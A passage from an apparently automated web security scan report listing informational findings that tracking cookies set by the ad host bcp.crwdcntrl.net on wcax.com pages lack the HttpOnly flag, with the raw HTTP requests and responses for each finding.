Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 09 Apr 2011 12:29:30 GMT
Connection: close
Set-Cookie: UID=167523a-24.143.206.177-1301787521; expires=Mon, 08-Apr-2013 12:29:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

6.61. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwXRCoy8DAqG9lK%2FmRQZ2BQUBJxY8NKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMVEyDFNQOsnU8UokEYTImcgyipBisROA4xxQ1MCT2DODcCwiuG6DsE4ZVAXPYerE9YH0zx%2FoP4wRSi7wDEuf5AHgAyMCmY; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgUPf%2F97i7DAyM%2Bla2kh9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydubQNSX22eAFDNQ%2FCcD3y8GHmUBByY0pUBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChdXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCc%2B7Nr; OAID=256d63b06b8b5a8d4fa891a87d791a1a

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:53 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBYy8DAqG9lFzCJQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAMxaPUk%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:30:53 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgsPb%2F97heBgZGfSu7gEkgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2NIOrL7dNAipmBgeknA98vBh5lAQcmoNL%2F%2F8FKgRQjA1AVo9BWS7geoErmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQWLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAE3ytyU%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:30:53 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.62. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkw8DAqG%2FlWMPHoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPADupPMQ%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOf%2F99h9DAyM%2BlaONXwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAihmo6CcD3y8GHmUBByag0v%2B%2FwUqBFCMDUBWj0FZLuB6mnwzMvxiYhTZtQhZi%2BcXApJQ0E24kRBWTUrwXWGglXIhRaNMOZI2MYFUucFUgPgOXTJ06ficH8O7DryBwETN%2BBVytkwgoqG%2FAr4Dz8XL8CrgTdhFSsBO%2FAr6Kt%2FgVyJpdxK8AADqztl4%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:28 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAUwsDAqG%2FlODuLQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAL3dPUc%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:28 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgKOT%2F99htDAyM%2BlaOs7NAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2BdPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQA0xrba; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:28 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.63. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRAUwsDAqG%2FlODuLQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAL3dPUc%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgKOT%2F99htDAyM%2BlaOs7NAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2BdPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQA0xrba

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRA0g4GBUd%2FKaclNBnUGBgGlBoYGoHgvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPBBeFkMIMD1GMJLh1CJECoBTPH%2FBVNsvGCKwwhMCZuBKa4ZYO18ohANwmBK5ByYEjgOUVkNpoSeQQxzgzg3AiJYDNF3CMIrgbjsPcTV%2FyDa9SE8U4i%2BAxDn%2BgN5AJdCPgQ%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaMb%2F77FFDAyM%2BlZOS26CxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBq6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgAPFLc2; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:36 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.64. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRA0g4GBUd%2FKaclNBnUGBgGlBoYGoHgvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPBBeFkMIMD1GMJLh1CJECoBTPH%2FBVNsvGCKwwhMCZuBKa4ZYO18ohANwmBK5ByYEjgOUVkNpoSeQQxzgzg3AiJYDNF3CMIrgbjsPcTV%2FyDa9SE8U4i%2BAxDn%2BgN5AJdCPgQ%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaMb%2F77FFDAyM%2BlZOS26CxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBq6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgAPFLc2

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:57 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC0loGBUd%2FK6dspBnUGBgGlBoYGoHgvmOK5DKZEt4Epwa9gipcZIncTIrcfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg6ipBpMCRyHmOIGpoSeQZwbAeEVQ%2FQdgvBKIC57D9GuD3H8PwhlCtF3AOJcfyAPAOu1Plw%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:57 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaO3%2F77GxDAyM%2BlZO306BxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBu6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCYn7d6; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:57 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.65. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDhxsDAqG8VcbmTQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeADd3Pa0%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsgwu3%2F9%2FAjDAyM%2BlYRlztBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtTQNSX2%2BuAFDMDg9BPBr5fDDzKAg5MQKX%2FH4GVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQBLgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBYVrRj

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 13:16:07 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAjzsDAqG%2BVvteOQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKPxPTA%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:07 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgRvz%2F9%2BDPDAyM%2Blbpe%2B1AYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvNIOrL7blAipmBQfgnA98vBh5lAQcmoNL%2FF8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1ioHi7EKLRpB7JGRrAqF7gqEJ%2BBS6ZOHb%2BTA3j34VcQuIgZvwKu1kkEFNQ34FfA%2BXg5fgXcCbsIKdiJXwFfxVv8CmTNLuJXAADN7bIU; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:07 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.66. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRC4hoGBUd%2FKnsuFQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAFZXPOU%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgcM3%2F73FxDAyM%2Blb2XC4gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0NIOrL7VNAipmBgfknA98vBh5lAQcmoNL%2F%2F8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoDVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAALT7Z1

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:07 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBkz8DAqG%2Fl6B7KoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPAEBwPMk%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:07 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyP7%2F99jTDAyM%2BlaO7qEgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBgeUnA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAABXLrZs; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:07 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.67. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBYy8DAqG9lFzCJQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAMxaPUk%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgsPb%2F97heBgZGfSu7gEkgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2NIOrL7dNAipmBgeknA98vBh5lAQcmoNL%2F%2F8FKgRQjA1AVo9BWS7geoErmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQWLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAE3ytyU%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:31:40 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC4hoGBUd%2FKnsuFQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAFZXPOU%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:31:40 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgcM3%2F73FxDAyM%2Blb2XC4gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0NIOrL7VNAipmBgfknA98vBh5lAQcmoNL%2F%2F8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoDVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAALT7Z1; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:31:40 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.68. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=login&referrer=http%3A//www.wcax.com/global/link.asp%3FL%3D104054%26function%3Dmanageprofile%26mode%3Dcreate%26referrer%3Dhttp%253A//www.wcax.com/Global/link.asp%253FL%253D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
